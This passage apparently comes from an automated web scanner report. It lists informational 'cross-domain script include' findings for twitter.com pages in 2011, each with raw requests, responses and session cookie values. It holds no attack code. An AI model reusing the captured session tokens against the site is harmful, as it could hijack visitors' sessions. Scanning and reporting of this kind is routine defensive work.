Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225038-20727-28381
ETag: "e3250478c3ea8a086affa5704f05f05d"
Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT
X-Runtime: 0.01142
Content-Type: text/html; charset=utf-8
Content-Length: 46926
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.541. http://twitter.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search?q=%23title HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234621-30105-56346
ETag: "61317f4bff6a487e772126d465b728cd"
Last-Modified: Fri, 28 Jan 2011 17:10:21 GMT
X-Runtime: 0.04128
Content-Type: text/html; charset=utf-8
Content-Length: 19717
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--e41b589258f43ce00a3c10f5af818420400a35c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a3.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

18.542. http://twitter.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-47325-41983
ETag: "98f573cd8faa541b15eed6e89977a1f8"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.07569
Content-Type: text/html; charset=utf-8
Content-Length: 19528
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UyNzM1ZTZiZTAyMzMyZmQ2NWQ3MzBlYmU0MWEz%250AODA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--b3402f9fff3f356babde838d74594264b0e647aa; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a2.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

18.543. http://twitter.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search?q=%23title HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225146-55911-59297
ETag: "1a4cc07300745eb2972aaf518a8d8062"
Last-Modified: Fri, 28 Jan 2011 14:32:26 GMT
X-Runtime: 0.05842
Content-Type: text/html; charset=utf-8
Content-Length: 20127
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYjg4MDk4ZmY3YmE3Mjg1ODM0MWE4ZDEzNzMzMDMy%250AYzY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--bcf319166b5d80f4aec8cb7e040774d7829464e0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a1.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

18.544. http://twitter.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /search

Issue detail

The response dynamically includes scripts from other domains. Hosts seen in the script tags of the captured response body:

a2.twimg.com
ajax.googleapis.com

Request

GET /search HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225145-63580-49735
ETag: "eec4d16b43e4c8e95f60951c5b2a67d5"
Last-Modified: Fri, 28 Jan 2011 14:32:25 GMT
X-Runtime: 0.04800
Content-Type: text/html; charset=utf-8
Content-Length: 19901
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlNDdkNWFhZTBiYTQ4ZGY5ZjUxMzYwMmYwMmI3ZWJj%250AYmI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--8b48d821027ac6ccf6e1de74ab0896f9fb5027eb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a2.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

18.545. http://twitter.com/sentience

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /sentience

Issue detail

The response dynamically includes scripts from other domains. Hosts seen in the script tags of the captured response body:

a0.twimg.com
a1.twimg.com
a2.twimg.com
a3.twimg.com
ajax.googleapis.com
www.google.com

Request

GET /sentience HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-43301-33019
ETag: "6e942a84bdcf3e0bad65268b7ad885b6"
Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.01443
Content-Type: text/html; charset=utf-8
Content-Length: 50391
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.546. http://twitter.com/simplemodal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /simplemodal

Issue detail

The response dynamically includes scripts from other domains. Hosts seen in the script tags of the captured response body:

a0.twimg.com
a1.twimg.com
a2.twimg.com
a3.twimg.com
ajax.googleapis.com
www.google.com

Request

GET /simplemodal HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:29:05 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224945-98814-3009
ETag: "203a0c353b6f6f89b45f107452b2203c"
Last-Modified: Fri, 28 Jan 2011 14:29:05 GMT
X-Runtime: 0.02016
Content-Type: text/html; charset=utf-8
Content-Length: 47151
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.547. http://twitter.com/sitepointdotcom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /sitepointdotcom

Issue detail

The response dynamically includes scripts from other domains. Hosts seen in the script tags of the captured response body:

a0.twimg.com
a1.twimg.com
a2.twimg.com
a3.twimg.com
ajax.googleapis.com
www.google.com

Request

GET /sitepointdotcom HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225034-62449-28872
ETag: "9ce581b329f6d5870310b5ced0d02fe8"
Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT
X-Runtime: 0.01185
Content-Type: text/html; charset=utf-8
Content-Length: 53056
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.548. http://twitter.com/slaterusa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /slaterusa

Issue detail

The response dynamically includes scripts from other domains. Hosts seen in the script tags of the captured response body:

a0.twimg.com
a1.twimg.com
a2.twimg.com
a3.twimg.com
ajax.googleapis.com
www.google.com

Request

GET /slaterusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-47321-52923
ETag: "e18f995e42882bc3925d1122528b563b"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.01113
Content-Type: text/html; charset=utf-8
Content-Length: 47275
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.549. http://twitter.com/slaterusa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /slaterusa

Issue detail

The response dynamically includes scripts from other domains. Hosts seen in the script tags of the captured response body:

a0.twimg.com
a1.twimg.com
a2.twimg.com
a3.twimg.com
ajax.googleapis.com
www.google.com

Request

GET /slaterusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
